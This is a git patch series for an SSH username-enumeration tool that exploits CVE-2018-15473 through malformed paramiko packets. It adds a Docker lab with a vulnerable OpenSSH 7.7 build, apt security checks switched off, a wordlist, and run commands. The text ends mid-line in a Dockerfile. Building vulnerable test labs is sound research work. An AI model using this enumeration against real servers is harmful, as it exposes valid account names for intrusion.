From 496a6cdb376142f7c1b737a4c01f67cd9df47ede Mon Sep 17 00:00:00 2001 From: cyberaguiar Date: Mon, 29 Apr 2024 10:08:56 -0300 Subject: [PATCH 1/4] Refactor handler table references in SSH monkey patch --- ssh-username-enum.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/ssh-username-enum.py b/ssh-username-enum.py index a6ac90e..4f80268 100755 --- a/ssh-username-enum.py +++ b/ssh-username-enum.py @@ -82,7 +82,7 @@ def patched_add_boolean(*args, **kwargs): """ Override correct behavior of paramiko.message.Message.add_boolean, used to produce malformed packets. """ auth_handler = paramiko.auth_handler.AuthHandler - old_msg_service_accept = auth_handler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] + old_msg_service_accept = auth_handler._handler_table.get(paramiko.common.MSG_SERVICE_ACCEPT) def patched_msg_service_accept(*args, **kwargs): """ Patches paramiko.message.Message.add_boolean to produce a malformed packet. """ @@ -95,7 +95,7 @@ def patched_userauth_failure(*args, **kwargs): """ Called during authentication when a username is not found. """ raise InvalidUsername(*args, **kwargs) - auth_handler._client_handler_table.update({ + auth_handler._handler_table.update({ paramiko.common.MSG_SERVICE_ACCEPT: patched_msg_service_accept, paramiko.common.MSG_USERAUTH_FAILURE: patched_userauth_failure }) From e3d5ac16def10f5f2c8c2ed9f9e2bd5576674ade Mon Sep 17 00:00:00 2001 From: cyberaguiar Date: Mon, 29 Apr 2024 10:09:27 -0300 Subject: [PATCH 2/4] Update cffi library to version 1.14.6 in requirements --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index f4ef21a..a3a716e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,6 @@ asn1crypto==0.24.0 bcrypt==3.1.4 -cffi==1.11.5 +cffi==1.14.6 cryptography==2.3.1 idna==2.7 paramiko==2.4.1 From 3bbaa432e5dd3914d0aa8fd1bb44b1b2ed830bdf Mon Sep 17 00:00:00 2001 From: cyberaguiar Date: Mon, 29 Apr 2024 10:10:04 -0300 Subject: [PATCH 3/4] Add Docker setup instructions to README --- README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/README.md b/README.md index 9748325..225f2fc 100644 --- a/README.md +++ b/README.md @@ -18,6 +18,20 @@ pipenv install -r requirements.txt # if you're cool like that chmod u+x ssh-username-enum.py ``` +Docker Setup +--- +Build Docker images +```bash +docker build -t vulnerable-openssh -f Dockerfile-openssh . +docker build -t cve-2018-15473 -f Dockerfile-cve-2018-15473 . +``` + +Run Docker containers +```bash +docker run -d --name vulnerable-openssh vulnerable-openssh +docker run -it --rm --link vulnerable-openssh:vulnerable-openssh cve-2018-15473 python ssh-username-enum.py -v -w users.txt -p 22 vulnerable-openssh +``` + Examples --- A single username From 570832b6618375237d2d4afbb1d529c347449df8 Mon Sep 17 00:00:00 2001 From: cyberaguiar Date: Mon, 29 Apr 2024 10:10:15 -0300 Subject: [PATCH 4/4] Add new Dockerfiles and user list for CVE testing --- Dockerfile-cve-2018-15473 | 22 ++++++++++++++++++++ Dockerfile-openssh | 43 +++++++++++++++++++++++++++++++++++++++ users.txt | 11 ++++++++++ 3 files changed, 76 insertions(+) create mode 100644 Dockerfile-cve-2018-15473 create mode 100644 Dockerfile-openssh create mode 100644 users.txt diff --git a/Dockerfile-cve-2018-15473 b/Dockerfile-cve-2018-15473 new file mode 100644 index 0000000..813119e --- /dev/null +++ b/Dockerfile-cve-2018-15473 @@ -0,0 +1,22 @@ +# Use the official Python image from the Docker Hub +FROM python:3.9 + +# Install system dependencies +RUN apt-get update && apt-get install -y libffi-dev gcc + +# Set the working directory in the container +WORKDIR /app + +# Copy the requirements file into the container at /app +COPY requirements.txt . +COPY users.txt . + +# Install the dependencies +RUN pip install --no-cache-dir -r requirements.txt + +# Copy the script into the container at /app +COPY ssh-username-enum.py . + +# Run the script when the container launches +CMD ["python", "ssh-username-enum.py"] + diff --git a/Dockerfile-openssh b/Dockerfile-openssh new file mode 100644 index 0000000..f44c6de --- /dev/null +++ b/Dockerfile-openssh @@ -0,0 +1,43 @@ +# Use Debian Jessie as the base image +FROM debian:jessie + +# Disable GPG signature checking and update repositories to archived versions +RUN echo 'Acquire::Check-Valid-Until "false";' >> /etc/apt/apt.conf.d/10no-check-valid-until && \ + echo 'Acquire::AllowInsecureRepositories "true";' >> /etc/apt/apt.conf.d/10allow-insecure && \ + sed -i 's/http:\/\/deb.debian.org\/debian/http:\/\/archive.debian.org\/debian/g' /etc/apt/sources.list && \ + sed -i 's/http:\/\/security.debian.org\/debian-security/http:\/\/archive.debian.org\/debian-security/g' /etc/apt/sources.list && \ + sed -i '/jessie-updates/d' /etc/apt/sources.list + +# Update packages and install necessary dependencies +RUN apt-get update && \ + apt-get install -y --force-yes wget build-essential zlib1g-dev libssl-dev libpam0g-dev openssh-client + +# Download and compile OpenSSH version 7.7 +RUN wget https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.7p1.tar.gz && \ + tar xzf openssh-7.7p1.tar.gz && \ + cd openssh-7.7p1 && \ + ./configure --with-md5-passwords --with-privsep-path=/var/lib/sshd && \ + make && make install + +# Create a user and group for SSHD privilege separation +RUN groupadd sshd && \ + useradd -g sshd -c 'sshd privsep' -d /var/lib/sshd -s /bin/false sshd + +# Create the user 'cyberaguiar' +RUN useradd -m cyberaguiar + +# Generate a random password and set it for the user 'cyberaguiar' +RUN echo "cyberaguiar:$(tr -dc A-Za-z0-9